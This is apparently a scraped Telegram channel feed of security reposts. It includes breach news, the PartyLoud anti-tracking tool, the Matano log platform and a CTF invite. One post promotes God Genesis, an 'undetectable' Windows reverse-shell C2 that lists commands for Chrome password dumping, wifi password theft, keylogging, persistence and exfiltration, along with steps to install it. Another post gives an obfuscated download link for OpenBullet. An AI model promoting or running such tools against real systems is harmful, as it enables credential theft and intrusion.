Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Microsoft data breach exposes over 65K customers’ contact info, emails Microsoft data breach exposes over 65K customers’ contact info, emailsPost Views: 94 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads…
osystem details, invoices, project details, customer product price list, POE documents, product orders, signed customer documents, internal comments for customers, sales strategies, and customer asset documents.

https://www.bleepstatic.com/images/news/u/1109292/2022/BlueBleed_search_portal.png
​Trending: Critical RCE Vulnerability Found in vm2 Sandbox Library Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
Source: bleepingcomputer.com Source Link https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-9-300x150.png Researchers find 633% increase in cyber-attacks aimed at open source repositoriesOctober 19, 2022
Reading Time: 3 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-8-300x150.png MyDeal data breach impacts 2.2M users, stolen data for sale onlineOctober 18, 2022
Reading Time: 3 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-7-1-300x150.png Microsoft 365 Message Encryption Can Leak Sensitive InfoOctober 17, 2022
Reading Time: 4 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-6-300x150.png GitLab patches RCE bug in GitHub import functionOctober 14, 2022
Reading Time: 3 minutes
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png Offensive Security & Ethical Hacking CourseBegin the learning curve of hacking now!
The post Microsoft data breach exposes over 65K customers’ contact info, emails first appeared on Black Hat Ethical Hacking.

___________________________
@hacking_Attack
@Hacking_Video
PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.

Simple. 3 files only, no installation required, just clone this repo an you're ready to go. Powerful. Thread-based navigation. Stealthy. Optimized to emulate user navigation. Portable. You can use this script on every unix-based OS. This project was inspired by noisy.py (https://github.com/1tayH/noisy)
How It Works URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files) If proxy flag has been used, proxy config will be tested For each URL in ULR-list a thread is started, each thread as an user agent (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent) associated Each thread will start by sending an HTTP (https://www.scaler.com/topics/hypertext-transfer-protocol/) request to the given URL The response if filtered using the keywords in order to prevent 404s and malformed (https://www.kitploit.com/search/label/Malformed) URLs A new URL is choosen from the list generated after filering Current thread sleeps for a random time Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key) Features Configurable urls list and blocklist Random DNS Mode : each request is done on a different DNS Server Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf) Error recovery (https://www.kitploit.com/search/label/Recovery) mechanism to protect Engines from failures Spoofed User Agent prevent from fingerprinting (https://www.kitploit.com/search/label/Fingerprinting) (each engine has a different user agent) Dynamic UI Setup Clone the repository: git clone https://github.com/realtho/PartyLoud.git Navigate to the directory (https://www.kitploit.com/search/label/Directory) and make the script executable: cd PartyLoud
chmod +x partyloud.sh Run 'partyloud': ./partyloud.sh Usage DNS Servers are sourced from specified FILE, each request will use a different DNS Server in the list !!WARNING THIS FEATURE IS EXPERIMENTAL!! !!PLEASE LET ME KNOW ISSUES ON GITHUB !! -l --url-list read URL list from specified FILE -b --blocklist read blocklist from specified FILE -p --http-proxy set a HTTP proxy -s --https-proxy set a HTTPS proxy -n --no-wait disable wait between one request and an other -h --help dispaly this help" dir="auto">Usage: ./partyloud.sh [options...]

-d --dns DNS Servers are sourced from specified FILE,
each request will use a different DNS Server
in the list
!!WARNING THIS FEATURE IS EXPERIMENTAL!!
!!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list read URL list from specified FILE
-b --blocklist read blocklist from specified FILE
-p --http-proxy set a HTTP proxy
-s --https-proxy set a HTTPS proxy
-n --no-wait disable wait between one request and an other
-h --help dispaly this help To stop the script press either enter or CRTL-C  File Specifications In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub

___________________________
@hacking_Attack
@Hacking_Video
Intro If you don’t have special needs , default config files are just fine to get you started. Default files are located in: badwords (https://github.com/davideolgiati/PartyLoud/blob/master/badwords) partyloud.conf (https://github.com/davideolgiati/PartyLoud/blob/master/partyloud.conf) DNSList (https://github.com/davideolgiati/PartyLoud/blob/master/DNSList) Please note that file name and extension are not important, just content of files matter badwords (https://github.com/davideolgiati/PartyLoud/blob/master/badwords) - Keywords-based blocklist badwords (https://github.com/davideolgiati/PartyLoud/blob/master/badwords) is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file: DO DONT  Use only ASCII chars Define one-site-only rules Try to keep the rules as general as possible Define case-sensitive rules Prefer relative path Place more than one rule per line partyloud.conf (https://github.com/davideolgiati/PartyLoud/blob/master/partyloud.conf) - ULR List partyloud.conf (https://github.com/davideolgiati/PartyLoud/blob/master/partyloud.conf) is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you. Note #1 - To work properly the URLs must be well-formed (https://earthsci.stanford.edu/computing/hosting/urlsyntax/index.php) Note #2 - Even if the file contains 1000 lines only 10 are used (first 10, working on randomness) Note #3 - Only one URL per line is allowed DNSList (https://github.com/davideolgiati/PartyLoud/blob/master/DNSList) - DNS List DNSList (https://github.com/davideolgiati/PartyLoud/blob/master/DNSList) is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the “default file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness. Note #1 - Only one address per line is allowed
Download PartyLoud (https://github.com/davideolgiati/PartyLoud)

___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
God Genesis : Payload Capable Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.

The List Of Commands It Supports :-
===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --> Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc


===================================================================================================
EXPLOITATION COMMANDS:
===================================================================================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI Features Of Our FrameworkCheck The Video To Get A Detail Knowledge
1. The Payload.py is [...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials God Genesis : Payload Capable Bypass All The Known Antiviruses And Endpoints God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait…
a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time. How To Use Our Tool?git clone https://github.com/SaumyajeetDas/GodGenesis.git
pip3 install -r requirements.txt
python3 c2c.py
It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules. Click Here To Download

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Matano : The Open-Source Security Lake Platform For AWS

Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU05Y1sofHm4ZapIXnFhRj-j0gdBgk8ANPrpfwpzHgfvUMzx6mLe92PRiAm2CXGqX3ZDrBepHrNPyWXiHkEnW5Ywn81OHVnx3OIrqxuJ2tF8FCMExPFCVoBLWAZBuCU8tyBjWkCzOuB2fRizEE_JNDxfEPPdSfwL-4j3CCI8bHFYGoRk_RRlpwngeX/s1343/Matano.png FeaturesCollect data from all your sourcesMatano lets you collect log data from sources using S3 or SQS based ingestion. Ingest, transform, normalize log dataMatano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema. Store data in S3 object storageLog data is always stored in S3 object storage, for cost effective, long term, durable storage. Apache Iceberg Data lakeAll data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in. ServerlessMatano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling. Detections as codeWrite Python detections to implement realtime alerting on your log data. InstallingView the complete installation instructions.

You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment. Requirements* Docker InstallationMatano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.

For example, to install the Matano CLI for Linux, run:
curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh Getting startedRead the complete docs on getting started. DeploymentTo get started with Matano, run the matano initcommand. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).

The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmnPfIoDf8zG5akIJCPrLq1fazXG-89V_K2uVL2GZ0-DTx9eUCb0SMGLne432tXp0gexAFzzuouhXWK8GBKafJwHIdV7V30fxawzPjGIo4qYncZr6lv1nO8FeaPlv0N69X_Meb1K4W02wzgwlRuTXbfi0B1CvP0ispb1XRo_I_An3uAqRGUZNDD26c/s1770/Matano1.gif Click Here To Download

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Little capture the flag

Hi all,

I've created a simple capture the flag platform. You can register for free, and have fun playing/hacking through different categories like crypto, coding, reverse engineering and much more...



New challenges gonna be released every month and some new features are also on the todo list (badge system, etc...)

You can regist here: https://ctf.securityvalley.org



Have fun playing :-)

submitted by /u/docaicdev
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Openbullet Anomaly 1.4.4

Link for the tool for education purposes: https*://gofile.*io/d/*WotH4T (Remove * characters from the link), best to open on a VM since it's not my upload.

submitted by /u/Harrisonpeers
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking

https://blogger.googleusercontent.com/img/a/AVvXsEgfik1VBgFBYXx3Jijkq7L26Znz8PyZqaUpokPqDSK7smln8HsMyWgynYJX_uHxHcyeDDwSP3pmFRiXxaEu20bDje5OSVyX2k_Kr4MgLhcoe2TvE54OUR0zqF4PSm_vj2UOGVpGnjp3B-2Z8DgmjZdRYe3IO7LfS3aLHYV9Hjkt1ZtbJXNkbvvCSfbOWg=w640-h434 PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.
* Simple. 3 files only, no installation required, just clone this repo an you're ready to go.
* Powerful. Thread-based navigation.
* Stealthy. Optimized to emulate user navigation.
* Portable. You can use this script on every unix-based OS.

This project was inspired by noisy.py How It Works 1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
2. If proxy flag has been used, proxy config will be tested
3. For each URL in ULR-list a thread is started, each thread as an user agent associated
4. Each thread will start by sending an HTTP request to the given URL
5. The response if filtered using the keywords in order to prevent 404s and malformed URLs
6. A new URL is choosen from the list generated after filering
7. Current thread sleeps for a random time
8. Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key) Features * Configurable urls list and blocklist
* Random DNS Mode : each request is done on a different DNS Server
* Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf)
* Error recovery mechanism to protect Engines from failures
* Spoofed User Agent prevent from fingerprinting (each engine has a different user agent)
* Dynamic UI Setup Clone the repository: git clone https://github.com/realtho/PartyLoud.gitNavigate to the directory and make the script executable: cd PartyLoud
chmod +x partyloud.sh
Run 'partyloud': ./partyloud.shUsage Usage: ./partyloud.sh [options...]

-d --dns
To stop the script press either enter or CRTL-CFile Specifications In current release there is no input-validation on files.If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub IntroIf you don’t have special needs , default config files are just fine to get you started.
Default files are located in:

* badwords
* partyloud.conf
* DNSList

Please note that file name and extension are not important, just content of files matter badwords - Keywords-based blocklistbadwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:
DO DONT

Use only ASCII chars Define one-site-only rules Try to keep the rules as general as possible Define case-sensitive rules Prefer relative p[...]

___________________________
@hacking_Attack
@Hacking_Video